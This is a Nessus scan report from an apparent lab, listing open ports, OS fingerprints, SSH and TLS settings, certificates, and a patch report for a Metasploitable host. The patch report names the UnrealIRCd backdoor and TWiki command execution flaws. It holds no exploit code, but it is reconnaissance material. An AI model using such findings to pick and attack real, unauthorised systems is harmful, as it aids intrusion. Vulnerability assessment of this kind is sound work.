Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/80/www

Port 80/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/111/rpc-portmapper

Port 111/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/139/smb

Port 139/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/445/cifs

Port 445/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/512

Port 512/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/513/rlogin

Port 513/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/514/rsh

Port 514/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/1099/rmi_registry

Port 1099/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/1524

Port 1524/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/2121/ftp

Port 2121/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/3306/mysql

Port 3306/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/3632

Port 3632/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/5432/postgresql

Port 5432/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/5900/vnc

Port 5900/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/6000/x11

Port 6000/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/6667/irc

Port 6667/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/8009/ajp13

Port 8009/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/8180/www

Port 8180/tcp was found to be open

11219 - Nessus SYN scanner
-
Synopsis
It is possible to determine which TCP ports are open.
Description
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.

Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but they might cause problems for less robust firewalls and also leave unclosed connections on the remote target, if the network is loaded.
Solution
Protect your target with an IP filter.
Risk Factor
None
Plugin Information
Published: 2009/02/04, Modified: 2025/02/12
Plugin Output

tcp/8787

Port 8787/tcp was found to be open

19506 - Nessus Scan Information
-
Synopsis
This plugin displays information about the Nessus scan.
Description
This plugin displays, for each tested host, information about the scan itself :

- The version of the plugin set.
- The type of scanner (Nessus or Nessus Home).
- The version of the Nessus Engine.
- The port scanner(s) used.
- The port range scanned.
- The ping round trip time
- Whether credentialed or third-party patch management checks are possible.
- Whether the display of superseded patches is enabled
- The date of the scan.
- The duration of the scan.
- The number of hosts scanned in parallel.
- The number of checks done in parallel.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2005/08/26, Modified: 2025/06/06
Plugin Output

tcp/0

Information about this scan :

Nessus version : 10.8.4
Nessus build : 20028
Plugin feed version : 202506181702
Scanner edition used : Nessus Home
Scanner OS : LINUX
Scanner distribution : es8-x86-64
Scan type : Normal
Scan name : Metasploitable Ultra
Scan policy used : Advanced Scan
Scanner IP : 172.19.0.4
Port scanner(s) : nessus_syn_scanner
Port range : default
Ping RTT : 142.743 ms
Thorough tests : no
Experimental tests : no
Scan for Unpatched Vulnerabilities : no
Plugin debugging enabled : no
Paranoia level : 1
Report verbosity : 1
Safe checks : yes
Optimize the test : yes
Credentialed checks : no
Patch management checks : None
Display superseded patches : yes (supersedence plugin did not launch)
CGI scanning : enabled
Web application tests : disabled
Max hosts : 256
Max checks : 5
Recv timeout : 5
Backports : Detected
Allow post-scan editing : Yes
Nessus Plugin Signature Checking : Enabled
Audit File Signature Checking : Disabled
Scan Start Date : 2025/6/19 9:34 UTC
Scan duration : 1170 sec
Scan for malware : no
209654 - OS Fingerprints Detected
-
Synopsis
Multiple OS fingerprints were detected.
Description
Using a combination of remote probes (TCP/IP, SMB, HTTP, NTP, SNMP, etc), it was possible to gather one or more fingerprints from the remote system. While the highest-confidence result was reported in plugin 11936, “OS Identification”, the complete set of fingerprints detected are reported here.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2025/02/26, Modified: 2025/03/03
Plugin Output

tcp/0


Following OS Fingerprints were found

Remote operating system : Ubuntu 18.04 Linux Kernel 4.15
Confidence level : 56
Method : MLSinFP
Type : unknown
Fingerprint : unknown

Remote operating system : Linux Kernel 2.6 on Ubuntu 8.04 (hardy)
Confidence level : 95
Method : SSH
Type : general-purpose
Fingerprint : SSH:SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1

Remote operating system : Linux Kernel 2.6
Confidence level : 55
Method : FTP
Type : general-purpose
Fingerprint : unknown

Remote operating system : Linux Kernel 2.6 on Ubuntu 8.04 (gutsy)
Confidence level : 95
Method : HTTP
Type : general-purpose
Fingerprint : unknown

Remote operating system : Linux Kernel 2.6
Confidence level : 65
Method : SinFP
Type : general-purpose
Fingerprint : SinFP:
P1:B10113:F0x12:W64240:O0204ffff:M1460:
P2:B10113:F0x12:W65160:O0204ffff0402080affffffff4445414401030307:M1460:
P3:B00000:F0x00:W0:O0:M0
P4:191004_7_p=2121

Remote operating system : Unix
Confidence level : 70
Method : smb
Type : general-purpose
Fingerprint : unknown

Remote operating system : Unix
Confidence level : 69
Method : MSRPC
Type : general-purpose
Fingerprint : unknown

Following fingerprints could not be used to determine OS :
SMTP:!:220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
SSLcert:!:i/CN:ubuntu804-base.localdomaini/O:OCOSAi/OU:Office for Complication of Otherwise Simple Affairss/CN:ubuntu804-base.localdomains/O:OCOSAs/OU:Office for Complication of Otherwise Simple Affairs
ed093088706603bfd5dc237399b498da2d4d31c6
i/CN:ubuntu804-base.localdomaini/O:OCOSAi/OU:Office for Complication of Otherwise Simple Affairss/CN:ubuntu804-base.localdomains/O:OCOSAs/OU:Office for Complication of Otherwise Simple Affairs
ed093088706603bfd5dc237399b498da2d4d31c6
11936 - OS Identification
-
Synopsis
It is possible to guess the remote operating system.
Description
Using a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, SNMP, etc.), it is possible to guess the name of the remote operating system in use. It is also possible sometimes to guess the version of the operating system.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2003/12/09, Modified: 2025/06/03
Plugin Output

tcp/0


Remote operating system : Linux Kernel 2.6 on Ubuntu 8.04 (gutsy)
Confidence level : 95
Method : HTTP

Not all fingerprints could give a match. If you think that these
signatures would help us improve OS fingerprinting, please submit
them by visiting https://www.tenable.com/research/submitsignatures.

SSH:SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
SinFP:
P1:B10113:F0x12:W64240:O0204ffff:M1460:
P2:B10113:F0x12:W65160:O0204ffff0402080affffffff4445414401030307:M1460:
P3:B00000:F0x00:W0:O0:M0
P4:191004_7_p=2121
SMTP:!:220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
SSLcert:!:i/CN:ubuntu804-base.localdomaini/O:OCOSAi/OU:Office for Complication of Otherwise Simple Affairss/CN:ubuntu804-base.localdomains/O:OCOSAs/OU:Office for Complication of Otherwise Simple Affairs
ed093088706603bfd5dc237399b498da2d4d31c6
i/CN:ubuntu804-base.localdomaini/O:OCOSAi/OU:Office for Complication of Otherwise Simple Affairss/CN:ubuntu804-base.localdomains/O:OCOSAs/OU:Office for Complication of Otherwise Simple Affairs
ed093088706603bfd5dc237399b498da2d4d31c6



The remote host is running Linux Kernel 2.6 on Ubuntu 8.04 (gutsy)
117886 - OS Security Patch Assessment Not Available
-
Synopsis
OS Security Patch Assessment is not available.
Description
OS Security Patch Assessment is not available on the remote host.
This does not necessarily indicate a problem with the scan.
Credentials may not have been provided, OS security patch assessment may not be supported for the target, the target may not have been identified, or another issue may have occurred that prevented OS security patch assessment from being available. See plugin output for details.

This plugin reports non-failure information impacting the availability of OS Security Patch Assessment. Failure information is reported by plugin 21745 : 'OS Security Patch Assessment failed'. If a target host is not supported for OS Security Patch Assessment, plugin 110695 : 'OS Security Patch Assessment Checks Not Supported' will report concurrently with this plugin.
Solution
n/a
Risk Factor
None
References
XREF IAVB:0001-B-0515
Plugin Information
Published: 2018/10/02, Modified: 2021/07/12
Plugin Output

tcp/0


The following issues were reported :

- Plugin : no_local_checks_credentials.nasl
Plugin ID : 110723
Plugin Name : Target Credential Status by Authentication Protocol - No Credentials Provided
Message :
Credentials were not provided for detected SSH service.

181418 - OpenSSH Detection
-
Synopsis
An OpenSSH-based SSH server was detected on the remote host.
Description
An OpenSSH-based SSH server was detected on the remote host.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2023/09/14, Modified: 2025/06/16
Plugin Output

tcp/22/ssh


Service : ssh
Version : 4.7p1
Banner : SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1

50845 - OpenSSL Detection
-
Synopsis
The remote service appears to use OpenSSL to encrypt traffic.
Description
Based on its response to a TLS request with a specially crafted server name extension, it seems that the remote service is using the OpenSSL library to encrypt traffic.

Note that this plugin can only detect OpenSSL implementations that have enabled support for TLS extensions (RFC 4366).
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2010/11/30, Modified: 2020/06/12
Plugin Output

tcp/25/smtp

50845 - OpenSSL Detection
-
Synopsis
The remote service appears to use OpenSSL to encrypt traffic.
Description
Based on its response to a TLS request with a specially crafted server name extension, it seems that the remote service is using the OpenSSL library to encrypt traffic.

Note that this plugin can only detect OpenSSL implementations that have enabled support for TLS extensions (RFC 4366).
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2010/11/30, Modified: 2020/06/12
Plugin Output

tcp/5432/postgresql

48243 - PHP Version Detection
-
Synopsis
It was possible to obtain the version number of the remote PHP installation.
Description
Nessus was able to determine the version of PHP available on the remote web server.
Solution
n/a
Risk Factor
None
References
XREF IAVT:0001-T-0936
Plugin Information
Published: 2010/08/04, Modified: 2025/05/26
Plugin Output

tcp/80/www


Nessus was able to identify the following PHP version information :

Version : 5.2.4-2ubuntu5.10
Source : X-Powered-By: PHP/5.2.4-2ubuntu5.10
Source : http://metasploitable2.sicurform/phpinfo.php

66334 - Patch Report
-
Synopsis
The remote host is missing several patches.
Description
The remote host is missing one or more security patches. This plugin lists the newest version of each patch to install to make sure the remote host is up-to-date.

Note: Because the 'Show missing patches that have been superseded' setting in your scan policy depends on this plugin, it will always run and cannot be disabled.
Solution
Install the patches listed below.
Risk Factor
None
Plugin Information
Published: 2013/07/08, Modified: 2025/06/10
Plugin Output

tcp/0



. You need to take the following 5 actions :


[ Samba Badlock Vulnerability (90509) ]

+ Action to take : Upgrade to Samba version 4.2.11 / 4.3.8 / 4.4.2 or later.


[ TWiki 'rev' Parameter Arbitrary Command Execution (19704) ]

+ Action to take : Apply the appropriate hotfix referenced in the vendor advisory.


[ Tomcat Sample App cal2.jsp 'time' Parameter XSS (35806) ]

+ Action to take : Upgrade to Apache Tomcat version 4.1.40 / 5.5.28 / 6.0.20.
Alternatively, apply the appropriate patch referenced in the vendor advisory or undeploy the Tomcat examples web application.


[ UnrealIRCd Backdoor Detection (46882) ]

+ Action to take : Re-download the software, verify it using the published MD5 / SHA1 checksums, and re-install it.


[ phpMyAdmin prior to 4.8.6 SQLi vulnerablity (PMASA-2019-3) (125855) ]

+ Action to take : Upgrade to phpMyAdmin version 4.8.6 or later.
Alternatively, apply the patches referenced in the vendor advisories.

+Impact : Taking this action will resolve 2 different vulnerabilities (CVEs).


118224 - PostgreSQL STARTTLS Support
-
Synopsis
The remote service supports encrypting traffic.
Description
The remote PostgreSQL server supports the use of encryption initiated during pre-login to switch from a cleartext to an encrypted communications channel.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2018/10/19, Modified: 2022/04/11
Plugin Output

tcp/5432/postgresql


Here is the PostgreSQL's SSL certificate that Nessus
was able to collect after sending a pre-login packet :

------------------------------ snip ------------------------------
Subject Name:

Country: XX
State/Province: There is no such thing outside US
Locality: Everywhere
Organization: OCOSA
Organization Unit: Office for Complication of Otherwise Simple Affairs
Common Name: ubuntu804-base.localdomain
Email Address: root@ubuntu804-base.localdomain

Issuer Name:

Country: XX
State/Province: There is no such thing outside US
Locality: Everywhere
Organization: OCOSA
Organization Unit: Office for Complication of Otherwise Simple Affairs
Common Name: ubuntu804-base.localdomain
Email Address: root@ubuntu804-base.localdomain

Serial Number: 00 FA F9 3A 4C 7F B6 B9 CC

Version: 1

Signature Algorithm: SHA-1 With RSA Encryption

Not Valid Before: Mar 17 14:07:45 2010 GMT
Not Valid After: Apr 16 14:07:45 2010 GMT

Public Key Info:

Algorithm: RSA Encryption
Key Length: 1024 bits
Public Key: 00 D6 B4 13 36 33 9A 95 71 7B 1B DE 7C 83 75 DA 71 B1 3C A9
7F FE AD 64 1B 77 E9 4F AE BE CA D4 F8 CB EF AE BB 43 79 24
73 FF 3C E5 9E 3B 6D FC C8 B1 AC FA 4C 4D 5E 9B 4C 99 54 0B
D7 A8 4A 50 BA A9 DE 1D 1F F4 E4 6B 02 A3 F4 6B 45 CD 4C AF
8D 89 62 33 8F 65 BB 36 61 9F C4 2C 73 C1 4E 2E A0 A8 14 4E
98 70 46 61 BB D1 B9 31 DF 8C 99 EE 75 6B 79 3C 40 A0 AE 97
00 90 9D DC 99 0D 33 A4 B5
Exponent: 01 00 01

Signature Length: 128 bytes / 1024 bits
Signature: 00 92 A4 B4 B8 14 55 63 25 51 4A 0B C3 2A 22 CF 3A F8 17 6A
0C CF 66 AA A7 65 2F 48 6D CD E3 3E 5C 9F 77 6C D4 44 54 1F
1E 84 4F 8E D4 8D DD AC 2D 88 09 21 A8 DA 56 2C A9 05 3C 49
68 35 19 75 0C DA 53 23 88 88 19 2D 74 26 C1 22 65 EE 11 68
83 6A 53 4A 9C 27 CB A0 B4 E9 8D 29 0C B2 3C 18 5C 67 CC 53
A6 1E 30 D0 AA 26 7B 1E AE 40 B9 29 01 6C 2E BC A2 19 94 7C
15 6E 8D 30 38 F6 CA 2E 75


------------------------------ snip ------------------------------
26024 - PostgreSQL Server Detection
-
Synopsis
A database service is listening on the remote host.
Description
The remote service is a PostgreSQL database server, or a derivative such as EnterpriseDB.
See Also
Solution
Limit incoming traffic to this port if desired.
Risk Factor
None
Plugin Information
Published: 2007/09/14, Modified: 2023/05/24
Plugin Output

tcp/5432/postgresql

40665 - Protected Web Page Detection
-
Synopsis
Some web pages require authentication.
Description
The remote web server requires HTTP authentication for the following pages. Several authentication schemes are available :

- Basic is the simplest, but the credentials are sent in cleartext.

- NTLM provides an SSO in a Microsoft environment, but it cannot be used on both the proxy and the web server. It is also weaker than Digest.

- Digest is a cryptographically strong scheme. Credentials are never sent in cleartext, although they may still be cracked by a dictionary attack.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2009/08/21, Modified: 2016/10/04
Plugin Output

tcp/8180/www


The following pages are protected by the Basic authentication scheme :

/host-manager/html
/manager/html
/manager/status

22227 - RMI Registry Detection
-
Synopsis
An RMI registry is listening on the remote host.
Description
The remote host is running an RMI registry, which acts as a bootstrap naming service for registering and retrieving remote objects with simple names in the Java Remote Method Invocation (RMI) system.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2006/08/16, Modified: 2025/03/19
Plugin Output

tcp/1099/rmi_registry

tcp/1099/rmi_registry

Valid response received for port 1099:
0x00: 51 AC ED 00 05 77 0F 01 0E 7A 07 9B 00 00 01 97 Q....w...z......
0x10: 87 8D 3B BC 80 02 75 72 00 13 5B 4C 6A 61 76 61 ..;...ur..[Ljava
0x20: 2E 6C 61 6E 67 2E 53 74 72 69 6E 67 3B AD D2 56 .lang.String;..V
0x30: E7 E9 1D 7B 47 02 00 00 70 78 70 00 00 00 00 ...{G...pxp....

53335 - RPC portmapper (TCP)
-
Synopsis
An ONC RPC portmapper is running on the remote host.
Description
The RPC portmapper is running on this port.

The portmapper allows someone to get the port number of each RPC service running on the remote host by sending either multiple lookup requests or a DUMP request.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2011/04/08, Modified: 2011/08/29
Plugin Output

tcp/111/rpc-portmapper

10263 - SMTP Server Detection
-
Synopsis
An SMTP server is listening on the remote port.
Description
The remote host is running a mail (SMTP) server on this port.

Since SMTP servers are the targets of spammers, it is recommended you disable it if you do not use it.
Solution
Disable this service if you do not use it, or filter incoming traffic to this port.
Risk Factor
None
References
XREF IAVT:0001-T-0932
Plugin Information
Published: 1999/10/12, Modified: 2020/09/22
Plugin Output

tcp/25/smtp


Remote SMTP server banner :

220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
42088 - SMTP Service STARTTLS Command Support
-
Synopsis
The remote mail service supports encrypting traffic.
Description
The remote SMTP service supports the use of the 'STARTTLS' command to switch from a cleartext to an encrypted communications channel.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2009/10/09, Modified: 2019/03/20
Plugin Output

tcp/25/smtp


Here is the SMTP service's SSL certificate that Nessus was able to
collect after sending a 'STARTTLS' command :

------------------------------ snip ------------------------------
Subject Name:

Country: XX
State/Province: There is no such thing outside US
Locality: Everywhere
Organization: OCOSA
Organization Unit: Office for Complication of Otherwise Simple Affairs
Common Name: ubuntu804-base.localdomain
Email Address: root@ubuntu804-base.localdomain

Issuer Name:

Country: XX
State/Province: There is no such thing outside US
Locality: Everywhere
Organization: OCOSA
Organization Unit: Office for Complication of Otherwise Simple Affairs
Common Name: ubuntu804-base.localdomain
Email Address: root@ubuntu804-base.localdomain

Serial Number: 00 FA F9 3A 4C 7F B6 B9 CC

Version: 1

Signature Algorithm: SHA-1 With RSA Encryption

Not Valid Before: Mar 17 14:07:45 2010 GMT
Not Valid After: Apr 16 14:07:45 2010 GMT

Public Key Info:

Algorithm: RSA Encryption
Key Length: 1024 bits
Public Key: 00 D6 B4 13 36 33 9A 95 71 7B 1B DE 7C 83 75 DA 71 B1 3C A9
7F FE AD 64 1B 77 E9 4F AE BE CA D4 F8 CB EF AE BB 43 79 24
73 FF 3C E5 9E 3B 6D FC C8 B1 AC FA 4C 4D 5E 9B 4C 99 54 0B
D7 A8 4A 50 BA A9 DE 1D 1F F4 E4 6B 02 A3 F4 6B 45 CD 4C AF
8D 89 62 33 8F 65 BB 36 61 9F C4 2C 73 C1 4E 2E A0 A8 14 4E
98 70 46 61 BB D1 B9 31 DF 8C 99 EE 75 6B 79 3C 40 A0 AE 97
00 90 9D DC 99 0D 33 A4 B5
Exponent: 01 00 01

Signature Length: 128 bytes / 1024 bits
Signature: 00 92 A4 B4 B8 14 55 63 25 51 4A 0B C3 2A 22 CF 3A F8 17 6A
0C CF 66 AA A7 65 2F 48 6D CD E3 3E 5C 9F 77 6C D4 44 54 1F
1E 84 4F 8E D4 8D DD AC 2D 88 09 21 A8 DA 56 2C A9 05 3C 49
68 35 19 75 0C DA 53 23 88 88 19 2D 74 26 C1 22 65 EE 11 68
83 6A 53 4A 9C 27 CB A0 B4 E9 8D 29 0C B2 3C 18 5C 67 CC 53
A6 1E 30 D0 AA 26 7B 1E AE 40 B9 29 01 6C 2E BC A2 19 94 7C
15 6E 8D 30 38 F6 CA 2E 75

------------------------------ snip ------------------------------

70657 - SSH Algorithms and Languages Supported
-
Synopsis
An SSH server is listening on this port.
Description
This script detects which algorithms and languages are supported by the remote service for encrypting communications.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2013/10/28, Modified: 2025/01/20
Plugin Output

tcp/22/ssh


Nessus negotiated the following encryption algorithm(s) with the server :

Client to Server: aes256-ctr
Server to Client: aes256-ctr

The server supports the following options for compression_algorithms_server_to_client :

none
zlib@openssh.com

The server supports the following options for mac_algorithms_client_to_server :

hmac-md5
hmac-md5-96
hmac-ripemd160
hmac-ripemd160@openssh.com
hmac-sha1
hmac-sha1-96
umac-64@openssh.com

The server supports the following options for server_host_key_algorithms :

ssh-dss
ssh-rsa

The server supports the following options for encryption_algorithms_client_to_server :

3des-cbc
aes128-cbc
aes128-ctr
aes192-cbc
aes192-ctr
aes256-cbc
aes256-ctr
arcfour
arcfour128
arcfour256
blowfish-cbc
cast128-cbc
rijndael-cbc@lysator.liu.se

The server supports the following options for mac_algorithms_server_to_client :

hmac-md5
hmac-md5-96
hmac-ripemd160
hmac-ripemd160@openssh.com
hmac-sha1
hmac-sha1-96
umac-64@openssh.com

The server supports the following options for kex_algorithms :

diffie-hellman-group-exchange-sha1
diffie-hellman-group-exchange-sha256
diffie-hellman-group1-sha1
diffie-hellman-group14-sha1

The server supports the following options for compression_algorithms_client_to_server :

none
zlib@openssh.com

The server supports the following options for encryption_algorithms_server_to_client :

3des-cbc
aes128-cbc
aes128-ctr
aes192-cbc
aes192-ctr
aes256-cbc
aes256-ctr
arcfour
arcfour128
arcfour256
blowfish-cbc
cast128-cbc
rijndael-cbc@lysator.liu.se
149334 - SSH Password Authentication Accepted
-
Synopsis
The SSH server on the remote host accepts password authentication.
Description
The SSH server on the remote host accepts password authentication.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2021/05/07, Modified: 2021/05/07
Plugin Output

tcp/22/ssh

10881 - SSH Protocol Versions Supported
-
Synopsis
A SSH server is running on the remote host.
Description
This plugin determines the versions of the SSH protocol supported by the remote SSH daemon.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2002/03/06, Modified: 2024/07/24
Plugin Output

tcp/22/ssh

The remote SSH daemon supports the following versions of the
SSH protocol :

- 1.99
- 2.0
153588 - SSH SHA-1 HMAC Algorithms Enabled
-
Synopsis
The remote SSH server is configured to enable SHA-1 HMAC algorithms.
Description
The remote SSH server is configured to enable SHA-1 HMAC algorithms.

Although NIST has formally deprecated use of SHA-1 for digital signatures, SHA-1 is still considered secure for HMAC as the security of HMAC does not rely on the underlying hash function being resistant to collisions.

Note that this plugin only checks for the options of the remote SSH server.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2021/09/23, Modified: 2022/04/05
Plugin Output

tcp/22/ssh


The following client-to-server SHA-1 Hash-based Message Authentication Code (HMAC) algorithms are supported :

hmac-sha1
hmac-sha1-96

The following server-to-client SHA-1 Hash-based Message Authentication Code (HMAC) algorithms are supported :

hmac-sha1
hmac-sha1-96
10267 - SSH Server Type and Version Information
-
Synopsis
An SSH server is listening on this port.
Description
It is possible to obtain information about the remote SSH server by sending an empty authentication request.
Solution
n/a
Risk Factor
None
References
XREF IAVT:0001-T-0933
Plugin Information
Published: 1999/10/12, Modified: 2024/07/24
Plugin Output

tcp/22/ssh


SSH version : SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
SSH supported authentication : publickey,password

56984 - SSL / TLS Versions Supported
-
Synopsis
The remote service encrypts communications.
Description
This plugin detects which SSL and TLS versions are supported by the remote service for encrypting communications.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2011/12/01, Modified: 2025/06/16
Plugin Output

tcp/25/smtp


This port supports SSLv2/SSLv3/TLSv1.0.

56984 - SSL / TLS Versions Supported
-
Synopsis
The remote service encrypts communications.
Description
This plugin detects which SSL and TLS versions are supported by the remote service for encrypting communications.
Solution
n/a
Risk Factor
None
